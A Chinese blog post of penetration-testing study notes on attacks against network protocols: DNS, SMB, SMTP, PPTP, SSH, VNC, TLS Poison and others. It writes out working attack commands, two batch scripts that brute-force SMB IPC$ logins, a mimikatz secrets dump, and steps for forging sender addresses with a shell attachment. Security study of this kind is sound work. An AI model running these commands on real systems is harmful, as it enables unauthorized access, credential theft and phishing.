Protocol - Exploits学习笔记

最新推荐文章于 2024-04-27 21:22:05 发布

C-haidragon

最新推荐文章于 2024-04-27 21:22:05 发布

阅读量269

点赞数

文章标签：学习服务器网络数据库运维

本文链接：https://blog.csdn.net/sinat_35360663/article/details/127615528

版权

Protocol - Exploits

注:本分类里内容并非全是协议的 bug,部分 "基于、使用" 这个协议的应用所存在的漏洞也算在其中,例如 dns 域传送漏洞,其并非 dns 协议本身的漏洞,为服务部署时的配置问题,但应用与 DNS 相关的业务,故此分类

免责声明

本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关.

DNS

关于 DNS

CVE-1999-0532 dns 域传送漏洞

简介

DNS 服务器分为：主服务器、备份服务器和缓存服务器，在主备服务器之间同步数据库，需要使用 “DNS 域传送”。

域传送是指后备服务器从主服务器拷贝数据，并用得到的数据更新自身数据库。若 DNS 服务器配置不当，可能导致匿名用户获取某个域的所有记录。造成整个网络的拓扑结构泄露给潜在的攻击者，包括一些安全性较低的内部主机，如测试服务器。
相关文章
- DNS域传送漏洞

POC | Payload | exp

dig @dns.xxx.edu.cn axfr xxx.edu.cn
# @ 指定域名服务器;
# axfr 为域传送指令;
# xxx.edu.cn 表示要查询的域名;

子域接管漏洞

什么是子域接管

子域名接管是注册不存在的域名以获得对另一个域的控制权的过程

域名(例如 sub.ffffffff0x.com)将 CNAME 记录用于另一个域(例如 sub.ffffffff0x.com CNAME f0x.com)。
在某个时间点, f0x.com 到期并可供任何人注册。
由于未从 ffffffff0x.com DNS 区域删除 CNAME 记录，因此注册 f0x.com 的任何人都可以完全控制 sub.ffffffff0x.com，直到删除 DNS 记录。

通过使用子域接管，攻击者可以从合法域中发送网络钓鱼电子邮件，执行跨站点脚本(XSS)或发布不实言论信息等恶意行为。

子域接管不仅限于 CNAME 记录。NS，MX 甚至 A 记录(均不受此限制)也将受到影响。

相关文章/案例

相关资源

EdOverflow/can-i-take-over-xyz

相关工具

elceef/dnstwist - 快速扫描成百上千个可能的域名组合，并提取与域名匹配的 IPv4 或 IPv6 地址
haccer/subjack - Subdomain Takeover tool written in Go
Echocipher/Subdomain-Takeover - 一个子域名接管检测工具

DNS Rebinding

DNS Rebinding

ipv6

相关文章

相关工具

vanhauser-thc/thc-ipv6 - IPv6 攻击工具箱
fgont/ipv6toolkit - SI6网络的IPv6工具包

LDAP

描述

轻量级目录访问协议，是一种在线目录访问协议，主要用于目录中资源的搜索和查询，是 X.500 的一种简便的实现。

LDAP 是一种运行于TCP/IP之上的在线目录访问协议，主要用于目录中资源的搜索和查询。使用最广泛的LDAP服务如微软的ADAM(Active Directory Application Mode)和OpenLDAP.

相关文章

相关工具

https://directory.apache.org/studio/

LDAP注入

相关文章

MQTT

fofa: port="1883" && protocol="mqtt

描述

MQTT(Message Queuing Telemetry Transport,消息队列遥测传输协议)。可以以极少的代码和有限的带宽，为远程设备提供实时可靠的消息服务，一种低开销、低带宽占用的即时通讯协议。MQTT协议运行于TCP之上，属于应用层协议。

相关文章

MQTT 相关工具

mosquitto - MQTT服务端程序

apt-get install mosquitto
apt-get install mosquitto-clients

mosquitto -v
mosquitto_sub -h 127.0.0.1 -t debug

mqtt.fx
thomasnordquist/MQTT-Explorer - An all-round MQTT client that provides a structured topic overview
emqx/MQTTX - Elegant Cross-platform MQTT 5.0 Desktop Client
node-red/node-red - Low-code programming for event-driven applications

暴力破解

zombiesam/joffrey - Stupid MQTT Brute Forcer

RTSP

描述

实时流媒体协议(RTSP)是一种网络控制协议，设计用于娱乐和通信系统，以控制流媒体服务器。该协议用于建立和控制终端之间的媒体会话。媒体服务器的客户端发出 VHS 风格的命令，如播放、录制和暂停，以方便实时控制媒体流从服务器到客户端(视频点播)或从客户端到服务器(语音录制)。

流媒体数据的传输本身不是 RTSP 的任务。大多数 RTSP 服务器使用实时传输协议 (RTP) 与实时控制协议 (RTCP) 相结合来传输媒体流。

暴力破解

Tek-Security-Group/rtsp_authgrinder

SMB

相关文章

SMB协议(445端口)渗透测试

信息收集

MSF 模块

use auxiliary/scanner/smb/smb_version
use exploit/multi/samba/usermap_script

nmblookup
```
nmblookup -A <victim_ip>
```

ngrep

"ngrep -i -d tap0 's.?a.?m.?b.?a.*[[:digit:]]'
smbclient -L \\\\<victim_ip>"

nmap脚本

nmap --script smb-vuln* -p139,445 -T4 -Pn <victim_ip>

枚举用户

nmap脚本

nmap --script smb-enum-users.nse -p 445 <目标IP>

rpcclient

rpcclient -U '' <目标IP>
    querydominfo
    enumdomusers
    queryuser <用户名>

enum4linux
```
enum4linux <目标IP>
```

获取共享

smbmap
```
smbmap -H  <victim_ip> -R <sharename>
```

smbclient

echo exit | smbclient -L \\\\$ip
"smbclient \\\\<victim_ip>\\<share>"
smbclient -L //<victim_ip> -N

nmap

nmap --script smb-enum-shares -p139,445 -T4 -Pn <victim_ip>

空会话

smbmap
```
smbmap -H <victim_ip>
```
rpcclient
```
rpcclient -U "" -N $ip
```
smbclient
```
smbclient //<victim_ip>/IPC$ -N
```

enum

enum -s <victim_ip>
enum -U <victim_ip>
enum -P <victim_ip>

enum4linux
```
enum4linux -a <victim_ip>
```

匿名共享

smbclient

smbclient //$ip/share -U username
smbclient \\\\<victim_ip>\\<share>
smbclient //<victim_ip>/<share>
smbclient //<victim_ip>/<share\ name>
smbclient //<victim_ip>/<""share name"">

rpcclient

rpcclient -U " " <victim_ip>
rpcclient -U " " -N <victim_ip>

暴力破解

可以暴力破解来获得目标主机的 smb 访问。

hydra -L user.txt -P pass.txt 192.168.1.1 smb

IPC 爆破

ip.txt 放入要爆破的 IP
pass.txt 放入爆破的密码
默认爆破用户：Administrator
爆破成功的结果，会在 bat 运行的当前目录生成 out.txt
爆破进度的查询：type log.txt，完成后当前目录生成 end.txt

非空连接爆破.bat

@echo off
cls
echo Useage: %0 ip.txt pass.txt
for /f %%t in (%1) do (
FOR /F "eol=; tokens=1,2,3* delims=, " %%i in (%2) do (
echo net use \\%%t\ipc$ "%%i" /user:"localhost\Administrator" >> log.txt
net use \\%%t\ipc$ "%%i" /user:"localhost\Administrator"  >NUL 2>NUL
IF NOT errorlevel 1 (
echo %%i  t:%%t>> out.txt
net use \\%%t\ipc$ /del
)
net use * /del /y >NUL 2>NUL
)
)
echo end >> end.txt

空连接爆破.bat

@echo off
cls
echo Useage: %0 ip.txt
for /f %%t in (%1) do (
echo net use \\%%t\ipc$ "" /user:"localhost\Administrator" >> log.txt
net use \\%%t\ipc$ "" /user:"localhost\Administrator"  >NUL 2>NUL
IF NOT errorlevel 1 (
echo success:%%t>> out.txt
net use \\%%t\ipc$ /del
)
net use * /del /y >NUL 2>NUL
)
echo end >> end.txt

利用 NTLM 值破解 SMB

主要依靠钓鱼,不是很适合在实战中使用,内容见 https://www.hackingarticles.in/4-ways-capture-ntlm-hashes-network/

PPTP

相关文章

渗透技巧——PPTP口令的获取与爆破

获得PPTP 口令

Windows系统拨号和宽带连接的配置信息存储在固定位置，路径如下： %APPDATA%\Microsoft\Network\Connections\Pbk\rasphone.pbk 查看该文件即可获得 PPTP 连接的配置信息，包括服务器 IP，不包含连接用户名和口令

mimikatz.exe privilege::debug token::elevate lsadump::secrets exit

windows 命令行下连接 PPTP VPN

rasdial "VPN Connection" username pass

# 关闭连接
rasphone -h "VPN Connection"

kali 连接 PPTP VPN

pptpsetup --create vpn --server xx.xx.xx.xx --username username --password pass --encrypt --start

# 将默认路由表修改为远程
route del default
route add default gw xx.xx.xx.xx

暴力破解 PPTP 口令

相关工具
- BlackArch/thc-pptp-bruter - kali 默认自带
```
cat wordlist | thc-pptp-bruter -u username xx.xx.xx.xxx
```
- pptp_password_hack.py

SMTP

描述

SMTP 为邮件协讫,默认端口 25.经常用来邮箱伪造,钓鱼攻击.

相关文章

SMTP 协议 25 端口渗透测试记录

相关工具

Rvn0xsy/SMTP-NC - SMTP Netcat , test SMTP protocol

邮件检测

SPF : http://spf.myisp.ch/
MX : https://toolbox.googleapps.com/apps/checkmx
DMARC : https://www.agari.com/insights/tools/DMARC

枚举用户

SMTP 用户枚举原理简介及相关工具

MAIL FROM   : 指定发件人地址
RCPT TO : 指定单个的邮件接收人;可有多个 RCPT TO;常在 MAIL FROM命令之后
VRFY    : 用于验证指定的用户/邮箱是否存在;由于安全原因,服务器常禁止此命令
EXPN    : 验证给定的邮箱列表是否存在,也常被禁用

SMTP 返回码
500 	格式错误,命令不可识别(此错误也包括命令行过长)
501 	参数格式错误
502 	命令不可实现
503 	错误的命令序列
504 	命令参数不可实现
211 	系统状态或系统帮助响应
214 	帮助信息
220 	服务就绪
221 	服务关闭传输信道
421 	服务未就绪,关闭传输信道(当必须关闭时,此应答可以作为对任何命令的响应)
250 	要求的邮件操作完成
251 	用户非本地,将转发向
450 	要求的邮件操作未完成,邮箱不可用(例如,邮箱忙)
550 	要求的邮件操作未完成,邮箱不可用(例如,邮箱未找到,或不可访问)
451 	放弃要求的操作;处理过程中出错
551 	用户非本地,请尝试
452 	系统存储不足,要求的操作未执行
552 	过量的存储分配,要求的操作未执行
553 	邮箱名不可用,要求的操作未执行(例如邮箱格式错误)
354 	开始邮件输入,以.结束
554 	操作失败
535 	用户验证失败
235 	用户验证成功
334 	等待用户输入验证信息

可以通过 Telnet 连接,在未禁用上述 SMTP 命令的服务器上,使用上述命令手动枚举用户名.

$ telnet xxx.xxx.xxx.xxx 25
Trying xxx.xxx.xxx.xxx...
Connected to xxx.xxx.xxx.xxx.
Escape character is '^]'.
220 mxt.xxx.xxx.cn ESMTP Postfix
VRFY root
252 2.0.0 root
VRFY bin
252 2.0.0 bin
VRFY admin
550 5.1.1 <admin>: Recipient address rejected: User unknown in local recipient table

$ telnet xxx.xxx.xxx.xxx 25
Trying xxx.xxx.xxx.xxx...
Connected to xxx.xxx.xxx.xxx.
Escape character is '^]'.
220 mxt.xxx.xxx.cn ESMTP Postfix
MAIL FROM:root
250 2.1.0 Ok
RCPT TO:root
250 2.1.5 Ok
RCPT TO:bin
250 2.1.5 Ok
RCPT TO:admin
550 5.1.1 <admin>: Recipient address rejected: User unknown in local recipient table

可以看到两种方式均返回 root、bin 用户是存在的,admin 用户不存在.

smtp-user-enum - kali 自带

smtp-user-enum -M VRFY -u root -t xxx.xxx.xxx.xxx
smtp-user-enum -M RCPT -u bin -t xxx.xxx.xxx.xxx
smtp-user-enum -M EXPN -u bin -t xxx.xxx.xxx.xxx

MSF 模块

use auxiliary/scanner/smtp/smtp_enum
set rhosts xxx.xxx.xxx.xxx
run

smtp-enum-users - nmap 脚本

nmap -p 25 --script smtp-enum-users.nse xxx.xxx.xxx.xxx

邮件伪造

相关文章
- 关于伪造邮件的简单研究
SPF邮件伪造

SPF 是 Sender PolicyFramework 的缩写，一种以 IP 地址认证电子邮件发件人身份的技术。接收邮件方会首先检查域名的 SPF 记录，来确定发件人的 IP 地址是否被包含在 SPF 记录里面，如果在，就认为是一封正确的邮件，否则会认为是一封伪造的邮件进行退回。SPF 可以防止别人伪造你来发邮件，是为了防范垃圾邮件而提出来的一种 DNS 记录，它是一种 TXT 类型的记录。

由于 SMTP 邮件服务商互相发送邮件是不需要认证的，邮件伪造也是利用这个特性来实现伪造任意发件人。

简单方法

telnet xxx.xxx.xxx.xxx 25
HELO xxxx.com   # 向邮件服务器提供连接的域名,也就是邮件将从哪台服务器发来.
MAIL FROM:admin@xxxx.com  # 伪造管理员身份来发邮件
RCPT TO:admin@xxxxx.com # 验证邮件地址是否存在.如果查询的是一个真实的 Email 地址,邮件服务器就会返回250状态码.验证邮箱存在的话,还可以给这个接受者邮箱发送邮件.
DATA    # 使用DATA命令来伪造邮箱内容,客户端告诉服务器自己准备发送邮件正文
354 go ahead, end data with CRLF.CRLF   # 服务器返回354,表示自己已经作好接受邮件的准备
"这是一个邮件伪造测试"  # 用英文状态的双引号来修饰正文,正文结束后,发送结束符.表明正文的结束.
.
QUIT

swaks

Swaks 的全称是 Swiss Army Knife SMTP(SMTP 界的瑞士军刀),用于测试 SMTP 协议的各种操作.

kali 自带

swaks

配合 https://support.smtp2go.com/hc/en-gb

swaks --to 目标@qq.com --from info@smtp2go.com\
--header-X-Mailer SMTP  --ehlo root@163.com --body 'test'\
--server mail.smtp2go.com -p 2525 -au 账号 -ap 密码 \
--attach /shell.docx --header "Subject:test" \
--h-From: 'test<root@163.com>'

SNMP

相关文章

相关工具

trailofbits/onesixtyone - SNMP 扫描器是一个程序，它向多个 IP 地址发送 SNMP 请求，尝试不同的团体字符串并等待回复。
dark-lbp/snmp_fuzzer - 检测工控设备 SNMP 问题的工具

snmp 弱口令

相关文章
- 烂泥:使用 snmpwalk 采集设备的 OID 信息
- snmp 弱口令引起的信息泄漏

利用

安装 yum -y install net-snmp-utils

Usage

snmpwalk -v 2c -c public 192.168.xxx.xxx
snmp-check 192.168.xxx.xxx -c public -v 2c

SSH

相关文章

SSH Pentesting Guide

相关工具

arthepsy/ssh-audit - SSH服务器审计(banner、密钥交换、加密、mac、压缩、兼容性、安全性等)

版本扫描

use auxiliary/fuzzers/ssh/ssh_version_2
set RHOSTS [ip]
run

libSSH

CVE-2018-10933 libSSH 认证绕过漏洞
- 概述
  
  libssh版本0.6及更高版本在服务端代码中具有身份验证绕过漏洞。通过向服务端提供SSH2_MSG_USERAUTH_SUCCESS消息来代替服务端期望启动身份验证的 SSH2_MSG_USERAUTH_REQUEST消息，攻击者可以在没有任何凭据的情况下成功进行身份验证。进而可以进行一些恶意操作。
- 相关文章
  - libSSH 认证绕过漏洞(CVE-2018-10933)分析
  - libssh CVE-2018-10933 身份验证绕过漏洞分析报告
- POC | Payload | exp
  - blacknbunny/CVE-2018-10933
  - leapsecurity/libssh-scanner

OpenSSH

OpenSSH(OpenBSD Secure Shell)是 OpenBSD 计划组的一套用于安全访问远程计算机的连接工具。该工具是 SSH 协议的开源实现，支持对所有的传输进行加密，可有效阻止窃听、连接劫持以及其他网络级的攻击。

CVE-2015-5600 Openssh MaxAuthTries限制绕过漏洞
- 概述
  
  OpenSSH 6.9 及之前版本的 sshd 中的 auth2-chall.c 文件中的‘kbdint_next_device’函数存在安全漏洞，该漏洞源于程序没有正确限制处理单链接中的 keyboard-interactive 设备。远程攻击者可借助 ssh -oKbdInteractiveDevices 选项中较长且重复的列表利用该漏洞实施暴力破解攻击，或造成拒绝服务。
- 相关文章
  - Openssh MaxAuthTries限制绕过漏洞(CVE-2015-5600)的研究与验证
CVE-2018-15473 OpenSSH 用户枚举漏洞
- 概述
  
  OpenSSH 7.7 及之前版本中存在信息泄露漏洞。该漏洞源于网络系统或产品在运行过程中存在配置等错误。未授权的攻击者可利用漏洞获取受影响组件敏感信息。
- 影响范围
  - OpenSSH 7.7及其以前版本
- 相关文章
  - OpenSSH用户枚举漏洞(CVE-2018-15473)分析
  - SSH用户枚举漏洞(CVE-2018-15473)原理学习
- POC | Payload | exp
  - trimstray/massh-enum
  - Rhynorater/CVE-2018-15473-Exploit
- MSF 模块
```
use auxiliary/scanner/ssh/ssh_enumusers
set rhosts [ip]
set USER_FILE [aaa.txt]
run
```
CVE-2020-15778 OpenSSH命令注入漏洞
- 概述
  
  该漏洞编号 CVE-2020-15778。OpenSSH 的 8.3p1 及之前版本中的 scp 允许在 scp.c 远程功能中注入命令，攻击者可利用该漏洞执行任意命令。目前绝大多数 linux 系统受影响。
- 相关文章
  - CVE-2020-15778：OpenSSH命令注入漏洞复现
  - CVE-2020-15778：鸡肋的高危

SunSSH

CVE-2020-14871 Oracle System Solaris PAM 组件缓冲区溢出漏洞
- 影响范围
  
  Oracle Solaris 11
  Oracle Solaris10
  Oracle Solaris 9(已不支持,2014年已终止)
- 扫描
  - https://github.com/arthepsy/ssh-audit
```
ssh-audit <ip>
关键字  "Sun_SSH"
```
- MSF 模块
```
solaris/ssh/pam_username_bof
```

SSL & TLS

关于 TLS

相关文章

相关工具

MassBleed - SSL 漏洞扫描器
sslscan - 测试启用SSL/TLS的服务，以发现支持的密码套件。
testssl - 在任何端口的任何地方测试 TLS/SSL 加密
coroner/cryptolyzer - 适用于 Python 2.7/3.4 以上的服务器加密(TLS/SSL)设置分析库

ja3(s)

https://github.com/salesforce/ja3
简介

ja3(s) 是为特定客户端与服务器之间的加密通信提供了具有更高的识别度的指纹，是 TLS 协商的指纹。

ja3 由 ClientHello 的版本、可接受的加密算法、扩展列表中的每一个 type 值、支持的椭圆曲线和支持的椭圆曲线格式 生成

ja3s 由 Server Hello 版本、可接受的加密算法和扩展列表中的每一个 type 值生成
相关文章
快速查看自己当前的 ja3 指纹
- https://ja3er.com/json

TLS Poison

相关资源

jmdx/TLS-poison

相关文章

描述

当客户端和服务器端初次建立 TLS 握手时(例如浏览器访问 HTTPS 网站)，需要双方建立一个完整的 TLS 连接，该过程为了保证数据的传输具有完整性和机密性，需要做很多事情，如密钥协商出会话密钥，数字签名身份验证，消息验证码 MAC 等。这个过程是非常消耗资源的，而且当下一次客户端访问同一个 HTTPS 网站时，这个过程需要再重复一次，这无疑会造成大量的资源消耗。

为了提高性能，TLS/SSL 提供了会话恢复的方式，允许客户端和服务端在某次关闭连接后，下一次客户端访问时恢复上一次的会话连接。会话恢复有两种，一种是基于 session ID 恢复，一种是使用 Session Ticket 的 TLS 扩展。

基于 session ID 的会话恢复

每一个会话都由一个 Session ID 标识符标识，当建立一个 TLS 连接时，服务器会生成一个 session ID 给客户端，服务端保留会话记录，重新连接的客户端可以在 clientHello 消息期间提供此会话 ID，并重新使用此前建立的会话密钥，而不需要再次经历秘钥协商等过程。

TLS session id 在 RFC-5077 中有着详细描述，基本所有数据都可以用作会话标志符，包括换行符。

Session ticket 和 session id 作用类似，在客户端和服务端建立了一次完整的握手后，服务端会将本次的会话数据加密，但是 session ticket 将会话记录保存在客户端，而且与 session id 32 字节的大小不同，session ticket 可提供 65k 的空间，这就能为我们的 payload 提供足够的空间。

攻击思路

session id 是服务器提供给客户端的，如果我们构建一个恶意的 tls 服务器，然后将我们的恶意 session id 发送给客户端，然后通过 dns rebinding，将服务器域名的地址指向内网 ip 应用，例如 memcache，客户端在恢复会话时就会带上恶意的 session id 去请求内网的 memcache，从而攻击了内网应用。

大致流程如下：

利用受害者服务器向攻击者准备的 TLS Server 发起一个 HTTPS 请求
当受害者打开这个页面后，受害者客户端会查询相应的 DNS 记录，最终会在攻击者准备的 DNS 服务器查询到攻击者提供的解析记录
攻击者的 DNS 服务器回应一个 TTL 为 0 的结果，指向攻击者的 TLS Server 服务器。
客户端发送 Client Hello 消息
服务端返回 Server Hello 消息，并在响应包中设置 session_id 为 payload
进行后续的TLS握手
握手完成后进行 http 通信时，攻击者 TLS Server 返回 301 跳转
受害者客户端接收跳转，这次跳转时由于前面那一次 DNS 解析的结果为 TTL 0，则会再次发起一次解析请求
此时攻击者让 DNS 服务器返回解析结果为 SSRF 攻击的目标(例如本地的 memcache 数据库),且 TTL 为 0
因为请求和跳转时的域名都没有变更，本次跳转会带着之前服务端返回的精心构造过的 SessionID 进行(TLS 会话重用)，发送到目标的那个端口上。
payload 被发送至 SSRF 攻击的目标,达到目的，成功 SSRF，但是因为会话重用失败，受害者客户端会得到一个 TLS Error 的错误。至此完成所有攻击步骤。

通过对 curl 解析 AAAA 和 A 记录的顺序进行利用(未复现成功)

出自文章基于 A 和 AAAA 记录的一种新 DNS Rebinding 姿势–从西湖论剑2020 Web HelloDiscuzQ 题对 Blackhat 上的议题做升华

在 CURL 中，对于一个域名，如果同时具有 A 记录和 AAAA 记录，那么 CURL 会去优先请求 AAAA 或者 A 记录所指向的地址，如果这些地址无法连接，则会尝试连接同时得到的 A 记录或者 AAAA 记录。

在某些情况下，会出现：

AAAA 记录地址不通，会连接到 A 记录地址上。
A记录地址不通，会连接到 AAAA 记录地址上。

第一个地址不通，则会尝试第二个地址。

那么我们可以这样做：

第一次让 CURL 去访问恶意的 HTTPS 服务器，拿到一个恶意的 SessionID，然后使恶意的 HTTPS 服务器无法接收新的连接
这时恶意的 HTTPS 给出第一次返回的结果，使其进行同域名跳转
目标跳转时会尝试进行新连接，目标发现恶意的HTTPS 服务器无法连接，则会尝试连接这个域名下的其他记录所指向的地址，并带上 SessionID

复现环境

双 A 记录

出自文章一篇文章带你读懂 TLS Poison 攻击#The Optimization Method OF DNS Rebinding

默认配置下，可以通过 0.0.0.0:11211 这个地址与 memcached 通信,对于返回的双 A 记录，一个配置为 TLS VPS IP ，另一个为 0.0.0.0 ，curl 每次都会优先使用 TLS VPS IP ，如果不能通信才会接着使用 0.0.0.0:11211

根据已知信息，我们可以让 curl 第一次建立链接，拿到我们分配的 payload 后，断开连接，让其第二次连接不通而去选择另外一个 IP

复现环境

https://github.com/ZeddYu/TLS-poison

TLS 1.2 Session Ticket

TLS 1.2 Session ID

https://blog.zeddyu.info/2021/04/20/tls-poison/#use-the-optimization-method-to-deal-with-tls-12-session-id

UPNP

相关工具

nccgroup/UPnP-Pentest-Toolkit

CVE-2020-12695

POC | Payload | exp
- yunuscadirci/CallStranger

VNC

相关文章

VNC攻击

未授权访问漏洞

概述

VNC 是虚拟网络控制台 Virtual Network Console 的英文缩写。它是一款优秀的远程控制工具软件由美国电话电报公司 AT&T 的欧洲研究实验室开发。VNC 是基于 UNXI 和 Linux 的免费开源软件由 VNC Server 和 VNC Viewer 两部分组成。VNC 默认端口号为 5900、5901。VNC 未授权访问漏洞如被利用可能造成恶意用户直接控制 target 主机。
vncviewer
```
# kali 自带
vncviewer [ip]
```

MSF 模块

use auxiliary/scanner/vnc/vnc_none_auth
set rhosts [ip]
set threads 50
run

暴力破解

MSF 模块

use auxiliary/scanner/vnc/vnc_login
set RHOSTS [ip]
set RPORT [port]
set pass_file /root/Desktop/pass.txt
run

密码破解

相关文章
- 破解vnc密码
相关工具
- k8vncpwd
- K8fuckVNC

Other

Ripple20

描述

安全研究人员在由 Treck 开发的 TCP/IP 协议栈中发现了多个漏洞，这一系列漏洞统称为 Ripple20。这些漏洞广泛存在于嵌入式和物联网设备中，影响了多个行业领域(包括医疗、运输、能源、电信、工业控制、零售和商业等)，涉及了众多供应商(包括 HP、Schneider Electric、Intel、Rockwell Automation、Caterpillar、Baxter 等)。

这些漏洞源于 Ripple20 的多个协议(包括 IPv4、ICMPv4、IPv6、IPv6OverIPv4、TCP、UDP、ARP、DHCP、DNS 或以太网链路层)在处理网络报文发送时存在缺陷，其中包括四个严重漏洞，它们的 CVE 编号分别为 CVE-2020-11896、CVE-2020-11898、CVE-2020-11910、CVE-2020-11911。CVE-2020-11896(CVSS 评分 10)可导致远程执行代码，CVE-2020-11897(CVSS 评分 10)可导致越界写入，CVE-2020-11901(CVSS 评分 9)可导致远程执行代码，CVE-2020-11898(CVSS 评分 9.1)可导致泄露敏感信息。其它 15 个 Ripple20 漏洞的严重程度各异，CVSS 评分分别从 3.1 到 8.2。

相关文章

相关资源

corelight/ripple20 - 用于检测 Ripple20 漏洞的 Zeek 脚本

POC | Payload | exp

jiansiting/ripple20-poc

AMNESIA33

描述

安全研究人员在多个被广泛使用的开源 TCP/IP 协议栈发现了多个漏洞，这一系列漏洞统称为 AMNESIA33。这些漏洞广泛存在于嵌入式和物联网设备中，影响了多个行业领域(包括医疗、运输、能源、电信、工业控制、零售和商业等)，目前已知范围内涉及了超 150 家供应商以及数以百万计的设备。与 URGEN11 和 Ripple20 不同的是，AMNESIA33 影响的是多个开源 TCP/IP 协议栈，因此这些漏洞可以悄无声息地影响到无数个代码库、开发团队与各个公司的产品。目前已知的漏洞涉及到了智能家居、工厂 PLC、SCADA 设备与工控交换机，电力监控等设备。

这些漏洞存在于 uIP、FNET、picoTCP 和 Nut/Net 等开源协议栈上，影响 TCP/IP 协议栈的多个组件，包括 DNS、IPv6、IPv4、TCP、ICMP、LLMNR 和 mDNS 等。其中包括多个严重漏洞，它们的 CVE 编号分别为 CVE-2020-17437、CVE-2020-17443、CVE-2020-24338、CVE-2020-24336、CVE-2020-25111。

CVE-2020-17437(CVSS 评分 8.2)、CVE-2020-17443(CVSS 评分 8.2)可导致设备拒绝服务。CVE-2020-24338、CVE-2020-24336、CVE-2020-25111(这三个 CVSS 评分均为 9.8)都可导致远程代码执行 (RCE)。其它 28 个漏洞的严重程度各异，CVSS 评分分别从 4 到 8.2。

由于 IoT、OT、IT 设备供应链的特性，漏洞影响的设备众多，影响范围广且持续时间长，漏洞修复的实施较困难。同时，由于 uIP、picoTCP 开源协议栈已经不再维护，所以部分漏洞没有补丁，很多产品只能寻找替代技术方案或者是增加防范措施。

相关文章

AMNESIA33：开源TCP/IP协议栈系列漏洞分析与验证

NAT Slipstreaming

https://github.com/samyk/slipstream/ - NAT Slipstreaming allows an attacker to remotely access any TCP/UDP services bound to a victim machine, bypassing the victim’s NAT/firewall, just by the victim visiting a website

相关文章

NAT Splitstreamming v1 浅析

点击关注，共同学习！安全狗的自我修养

github haidragon

https://github.com/haidragon

C-haidragon

关注

0
点赞
踩
1

收藏

觉得还不错? 一键收藏
打赏
0
评论
Protocol - Exploits学习笔记

Protocol - Exploits注:本分类里内容并非全是协议的 bug,部分 "基于、使用" 这个协议的应用所存在的漏洞也算在其中,例如 dns 域传送漏洞,其并非 dns 协议本身的漏洞,为服务部署时的配置问题,但应用与 DNS 相关的业务,故此分类免责声明本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关.大纲DNSip...
复制链接

扫一扫